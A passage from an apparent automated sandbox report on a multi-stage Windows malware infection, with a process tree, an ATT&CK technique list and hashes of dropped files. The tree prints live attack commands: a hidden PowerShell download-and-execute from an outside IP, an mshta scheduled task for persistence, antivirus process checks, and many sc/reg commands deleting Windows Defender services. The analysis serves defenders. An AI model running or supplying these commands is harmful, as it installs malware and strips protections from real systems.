        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4344
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5112
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4220
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1232
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2288
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4008
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2472
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:320
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4784
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4228
        
        C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4372
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4244
    - - C:\Users\Admin\AppData\Local\Temp\10435260101\QWWouxX.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10435260101\QWWouxX.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1572
    - - C:\Users\Admin\AppData\Local\Temp\10436260101\ICQ0sog.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10436260101\ICQ0sog.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4884
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4940
    - - C:\Users\Admin\AppData\Local\Temp\10439690101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10439690101\apple.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6132
      - C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3796
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\31F3.tmp\31F4.tmp\31F5.bat C:\Users\Admin\AppData\Local\Temp\262.exe"
        7⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\262.exe
        
        "C:\Users\Admin\AppData\Local\Temp\262.exe" go
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3140
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\333B.tmp\333C.tmp\333D.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"
        9⤵
        
        PID:3732
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        10⤵
        Launches sc.exe
        
        PID:5980
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:460
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        10⤵
        Delays execution with timeout.exe
        
        PID:2920
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:1756
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        10⤵
        Launches sc.exe
        
        PID:4560
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2240
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5772
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:1588
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        10⤵
        Launches sc.exe
        
        PID:1548
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        10⤵
        
        PID:4660
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:3800
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        10⤵
        Launches sc.exe
        
        PID:4520
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        10⤵
        
        PID:2200
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:1200
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        10⤵
        Launches sc.exe
        
        PID:5920
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        10⤵
        
        PID:5996
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        10⤵
        Launches sc.exe
        
        PID:948
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        10⤵
        Launches sc.exe
        
        PID:6084
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        10⤵
        
        PID:2768
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:1148
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        10⤵
        Launches sc.exe
        
        PID:3148
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        10⤵
        Modifies security service
        
        PID:1120
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:5104
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        10⤵
        Launches sc.exe
        
        PID:1824
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        10⤵
        
        PID:5232
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:3020
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        10⤵
        Launches sc.exe
        
        PID:3844
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        10⤵
        
        PID:1576
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:5300
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        10⤵
        Launches sc.exe
        
        PID:1860
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        10⤵
        
        PID:5436
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:952
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        10⤵
        Launches sc.exe
        
        PID:3672
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        10⤵
        
        PID:4968
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:4392
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        10⤵
        Launches sc.exe
        
        PID:4508
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        10⤵
        
        PID:984
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:1032
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        10⤵
        Launches sc.exe
        
        PID:3932
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        10⤵
        
        PID:4320
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:4312
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        10⤵
        Launches sc.exe
        
        PID:2844
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        10⤵
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:5704
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        10⤵
        Launches sc.exe
        
        PID:4224
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        10⤵
        
        PID:4340
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:1220
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        10⤵
        Launches sc.exe
        
        PID:5484
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        10⤵
        
        PID:2340
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:3896
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        10⤵
        Launches sc.exe
        
        PID:836
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        10⤵
        
        PID:2836
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:2956
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        10⤵
        Launches sc.exe
        
        PID:3980
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        10⤵
        
        PID:5564
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        10⤵
        
        PID:2660
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        10⤵
        
        PID:3948
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        10⤵
        
        PID:1568
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        10⤵
        
        PID:5608
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        10⤵
        Launches sc.exe
        
        PID:4424
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        10⤵
        Launches sc.exe
        
        PID:4000
    - - C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5756
    - - C:\Users\Admin\AppData\Local\Temp\10444380101\8e39410225.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444380101\8e39410225.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2940
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn F15JwmalZOT /tr "mshta C:\Users\Admin\AppData\Local\Temp\oYqJ4dJqb.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5952
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn F15JwmalZOT /tr "mshta C:\Users\Admin\AppData\Local\Temp\oYqJ4dJqb.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4784
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\oYqJ4dJqb.hta
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE
        
        "C:\Users\Admin\AppData\Local\TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4108
    - - C:\Users\Admin\AppData\Local\Temp\10444390101\6dae441910.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444390101\6dae441910.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4344
    - - C:\Users\Admin\AppData\Local\Temp\10444400101\b38033bd51.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444400101\b38033bd51.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3448
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444400101\b38033bd51.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2176
    - - C:\Users\Admin\AppData\Local\Temp\10444410101\11b30bdb42.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10444410101\11b30bdb42.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5744
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2T8895.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2T8895.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:4224
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:836
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  PID:2540

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:936

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6084 -ip 6084
1⤵
PID:3336

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\TempOULEWE2LRAMPBAII1QA1VMCNWO4UTOT2.EXE

Filesize
1.8MB

MD5
a616c70b521871a888c297266c93e4dc

SHA1
9c155bfcc1f54ad43feea0a5c03fc9d1b6529b7a

SHA256
788c57b940278eb945aec7589626e9282741922a6bf31769ab5beb4427a83eff

SHA512
9be0945d78d314e96e3b0d62ebe448e14650a9620bc9ba70df9c4d359f1302abcf28a1d553515bbfbc9f147041161a75b99742765cf7776f19a69ecd6989b662

Download Submit
C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe

Filesize
1.2MB

MD5
4641a0bec2101c82f575862f97be861c

SHA1
0dd1ee06cdb7ba9ef2aa1dc44c80f1bc2586d33b

SHA256
fc2ac17498bd7846607110e66426bdad0ab5302f5c7978dd72c20d99166292e1

SHA512
da87190b368b99feafdb6cfb2fe236c94741573f494ca1cc9127f3a34e9112e1c8d4bf794841b4f00d3f083bc8239226d7d6ffecb45eb02299ff4e03e6e3749a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10435260101\QWWouxX.exe

Filesize
946KB

MD5
99fa2a3f64994a182c851dfc314d9147

SHA1
53e4204543339534fe06f16f794b334b4d97b8fb

SHA256
083f0d9090d297c8159f1e9185bf4c98ae715d763d6abb06a7cf6742dbd7739c

SHA512
ff447fc7bbc1264d417e17654959074ae29d8b9089cad447b8f5af456ce1278e9797dbcd3bb84cc0e760100d019dbab05abc90ebd562d95489e8f5f336f2d1a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10436260101\ICQ0sog.exe

Filesize
956KB

MD5
1d6825f22f8f26878212627d309f4174

SHA1
ad3947881d41ad40d30b938329b8dad8d0de9304

SHA256
36751f6b35db9c957a6b12c24cb4abd550eda5a001bec06e08fb4f48f234f82f

SHA512
ab26e0dcd2fab2a5b5df28097880edcb05019f9eda2c5009218f30489d1d09d3e0bca449f468d5fb80458cebf7415eb5f5ae6bf06924cbb530d4d6c2c72c86e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\10439690101\apple.exe

Filesize
327KB

MD5
17b045d3037b19362f5710ef08a1c3a9

SHA1
b510e63483354299a982f8c8b8425e1611f60ad4

SHA256
ca1cf8c31abcbf6fa6d324098c97bea8452da24cfcf579a52a3d262c93a85557

SHA512
cd96011398083f83d0869df41acf62cc8ccb69ea92b5c83066098f4227aa60bf37af16c4b5118cb5497202c8f78ab4703c9d8acf61ca41f3512d882dd5f79ac0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe

Filesize
5.8MB

MD5
1dbdcaeaac26f7d34e872439997ee68d

SHA1
18c855f60fb83306f23634b10841655fb32a943b

SHA256
3142aecf9794be2f3894d3e1429d28f80918c5b41d516c9160e7cd3984a6f5a3

SHA512
aa447551d1d44d8b615a3d8a656c4085d024cc72fa9ead0b944c72dd7ff5bdab60fd7829440d9c2b4b2de364ca33d349e5716699e2cefd4835e35bbc7e421535

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444380101\8e39410225.exe

Filesize
938KB

MD5
a798a2631ae2bc2f61b80ce937c75c65

SHA1
f718fd2971eb1c17f0c1b7940c00e2e8ff18bcc2

SHA256
3d3acb05b2a067b5bd9f7561320c2a61a23344c8f3cb78ac429b4e22b9f955b6

SHA512
2d55ef28fe438b20f1a7122ecd8002ce4e7e57006eebec290693b4be923c11ea82b58c90b9028cb103af4e2f15617e1b6a3dca7d6abce501f96121d7eb920daf

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444390101\6dae441910.exe

Filesize
1.8MB

MD5
15c8b2c9850ae1e61fefc93fa7d68420

SHA1
c5ae1454178293c4b26934572a8189bc5bb19798

SHA256
835795ba6a18c56ddc56f0fad120d0a6f4ce47a55f8b9f29c59692e3965285f0

SHA512
faaaf9dd1a9bdf77e76c6faa3d305d071289e280922b37ec6742c21642a05edf15cfb57663319e425755a62793446944b6b16c5eb1328c1567d5bad4fa0579e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444400101\b38033bd51.exe

Filesize
5.9MB

MD5
e05432c13d42b8526ce4bc0dc240d297

SHA1
db6e9382425055030662ecdc95d6405d30dcf82a

SHA256
574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

SHA512
56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444410101\11b30bdb42.exe

Filesize
4.3MB

MD5
1fb7beea8967c3ce15e72e9a8d14dc28

SHA1
e2354deb9e8e84f7915bbad85fc934df8330557c

SHA256
56208f729c6b9895dd87a0f120972a8b48320b247b4f668f6ef9f483044d3e48

SHA512
6ba0db71de31f8ce3ee1cf84581015ac3bfc7fd898121214f92ba14b0f2b3bf75e11e9941c6d83f71364399af6be6159f141e78bde6b4f42036020842ff32381

Download Submit
C:\Users\Admin\AppData\Local\Temp\262.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com

Filesize
2KB

MD5
e47e5118de5c1527615a85a9bef2b032

SHA1
34e616deaa5099464a47e2e9751048bd9e134b40

SHA256
d1a62fa28ee8fd1e106dcf74763b0936e14f35e46e0ecef4265997014f33df38

SHA512
37a10db1b886540c632b5ba0c10550091cef3a0c4a8634ec0035d07e608860138f7921e2936442d955452c116fed7653703c9e748bb854730ac7caf6cd03e76a

Download Submit
C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Temp\689912\b

Filesize
521KB

MD5
71b3bb5ce306fba582a9d4046fbb0352

SHA1
c85f63b47e67c4fbedfe24b114d81e637d27dc2f

SHA256
9f9ddadfb6285fae95ccc2e958e865d56b4d38bd9da82c24e52f9675a430ecb8

SHA512
9054dd6ed941ae5444afb98c02dea3ac3b2a9504d7219964bedcd7f584257ff305fd2b724cb6f6cab914dfca550f944bbe3d091e6756d8a3302285be470bc7bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Batteries

Filesize
146KB

MD5
0bf8c0d3a3ac566f5f7f7ebaaf007648

SHA1
67b1c6a411c130ac6558887a991d042303a0db8f

SHA256
15b631091f78cb4763e3ea2f2cdd3c8aac27e79d6ac7f51a0fa0912139869f38

SHA512
383105f74d6581dc8d4b475e94e947bc9a47284352ef57447d7c7b01209ef8b2f5755126ee10449a7cff0fcf6c58bf08953c5c16806000920881a81a607972d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bg

Filesize
134KB

MD5
2752930460d0d3b746f2b5e2a45d1da6

SHA1
b04719a6454e7677cff9b27b1a35282fd4c1ec7c

SHA256
eedf3bdb777678ed83699392cb6b4ab3b8d78de049fc8fc0b42f7b681f4d936d

SHA512
bf7f8e9d8cf7f4181f9d27ddec59f9227b110ad2f94325f240911178ae30044b6944ab57f33f93cda164193f8e82650da8f7091706c7c4d2f55649fa95fd9481

Download Submit
C:\Users\Admin\AppData\Local\Temp\Boards

Filesize
109KB

MD5
b0ca263d0796db30dcfc455de7aba28b

SHA1
67b18ee429e63e2fba32d2cdd0eb908226e3e6c1

SHA256
adec6bb93bb4e9a7404805dc579bb49bb580e51ec3a851e7749df6edeef2f172

SHA512
2ef74ca5b92c0fb009b961ea8effc73190d0ad82bcf44d20922da01b2a371107921720db6e084cfdb352d0d540ba949fdc9361f0b001ce60d0cd24eda922b11f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Boss

Filesize
145KB

MD5
dfce5da157853581ad9c743ef4e1b987

SHA1
144bd937ed946c98a4862099a0a8185be00368cd

SHA256
003aaa87b74ea67ce7042547dfb97658c20b6ae7162537b4143d6daed7642a05

SHA512
f851323c1dcb1aba5c4d0137ada010809b916895239ea2f9f764e0ecc9f7f8f44037ac448ec6b02e4588b2569d5cf6572d16b7ab5a082575078f5e10f7a17b51

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bruce.psd

Filesize
25KB

MD5
bd138e8aade8c0664b6306e35bec9d18

SHA1
547ce0d06ce6f3b12fed658b3cf735ca8faacac6

SHA256
e867bc2e7d475d86fcdcdf4bf71a122c25061160ccbf8e22be9eb420e57300d5

SHA512
49d3e4a10411cc93e7539ff314986bedccaec305481e8d037479bc9d593b7d9476eeafca3af8b3e77e614ba53cb9209e89fdff337cab730d82228c159ee4a408

Download Submit
C:\Users\Admin\AppData\Local\Temp\Brunei

Filesize
119KB

MD5
6433807df047876ae4e1afac63591281

SHA1
bd0690e2837fba59ab274a592255deb5fb378067

SHA256
